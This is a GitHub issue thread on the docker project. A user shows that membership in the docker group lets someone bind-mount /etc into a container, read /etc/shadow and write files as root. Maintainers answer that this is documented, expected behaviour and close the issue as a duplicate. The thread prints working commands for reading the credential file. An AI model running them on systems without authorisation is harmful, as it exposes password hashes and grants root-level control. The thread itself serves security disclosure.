### ISSUE TITLE
I am not sure below case is design or security flawed pattern.

### ISSUE THREAD

**Issue by xiaods** [docker/docker#10585]
By default I can not access /etc/shadow because it is only readable by root or group wheel:
```bash
ajung@demo:~$ who am i
ajung    pts/2        Feb  5 07:03 

ajung@demo:~$ groups
ajung docker


ajung@demo:~$ ls -la /etc/shadow
-rw-r----- 1 root shadow 897 Jan 25 10:05 /etc/shadow


ajung@demo:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
```
Now I create a simple Docker image that exposes /data as mount point for a volume
```
FROM phusion/baseimage
VOLUME /data
```
Now I can start the container and attach any local filesystem to the container and access it with full root rights.

In this case I can easily access the content of the formerly protected /etc/shadow file
```
ajung@demo:~$ docker run -v /etc:/data zopyx/test cat /data/shadow
root:$6$rnW9d.................awVOOsWtCb41DY01:16457:0:99999:7:::
daemon:*:16457:0:99999:7:::
bin:*:16457:0:99999:7:::
sys:*:16457:0:99999:7:::
sync:*:16457:0:99999:7:::
games:*:16457:0:99999:7:::
```
I can also create content on a root filesystem as standard user 
```
ajung@demo:~$ docker run -v /etc:/data zopyx/test touch /data/hello-world.txt
ajung@demo:~$ ls -la /etc/hello-world.txt
-rw-r--r-- 1 root root 0 Feb  5 07:36 /etc/hello-world.txt
```
extract from original source:  https://www.andreas-jung.com/contents/on-docker-security-docker-group-considered-harmful

**Comment by phemmer** [comment]
If you're asking whether it is known that docker can be used to perform privileged actions against the host, then yes. See https://docs.docker.com/articles/security/#docker-daemon-attack-surface

**Comment by unclejack** [comment]
As @phemmer has stated above, only trusted users should be allowed acces to the Docker daemon and to the system itself.

This is explained thoroughly and quite clearly in the docs: https://docs.docker.com/articles/security/#docker-daemon-attack-surface
https://docs.docker.com/articles/security/

ACLs and permissions will most likely be added in the future, but that still doesn't mean it's a good idea to allow untrusted people to access the Docker daemon. Even if they don't have privileges to bind mount or run with `--privileged`, that doesn't meant they might not run something malicious, that they might not perform attacks on the host, on any shared local or remote resources, on remote systems (network floods, denial of service attacks and so on), that they won't do anything illegal by running some specific piece of code or that they won't disrupt anything at all in any way. That's why reading the section of the docs @phemmer has mentioned and taking all of this into account during deployment in production is extremely important.


Additionally, this question and concern has come up before. Among those issues are the ones below:
#1655
#5656
#7306
#9976

I'm going to close this issue because there's official documentation on this topic, this issue is a duplicate and the question has also been already answered.
